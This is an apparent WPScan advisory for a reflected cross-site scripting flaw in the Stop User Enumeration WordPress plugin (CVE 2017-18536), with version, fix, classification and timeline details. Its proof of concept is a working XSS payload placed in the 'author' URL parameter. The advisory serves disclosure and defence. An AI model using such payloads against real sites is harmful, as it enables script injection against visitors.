Stop User Enumeration 1.3.5-1.3.7 - Unauthenticated Reflected Cross-Site Scripting (XSS)



Proof of Concept
http://www.example.com/?author=1<img src=x onerror=javascript:prompt(document.domain)> 

Affects Plugin

fixed in version 1.3.8

References

CVE 2017-18536
URL https://plugins.trac.wordpress.org/changeset/1575129/stop-user-enumeration

Classification

Type XSS
OWASP Top 10 A7: Cross-Site Scripting (XSS)
CWE CWE-79

Miscellaneous

Submitter Zee Shan
Submitter Twitter @z33_5h4n
Views 4306
Verified No
WPVDB ID 8723

Timeline

Publicly Published 2017-01-15 (almost 3 years ago)
Added 2017-01-17 (almost 3 years ago)
Last Updated 2019-11-28 (13 days ago)

Our Other Services

Online WordPress Vulnerability Scanner WPScan WordPress Security Plugin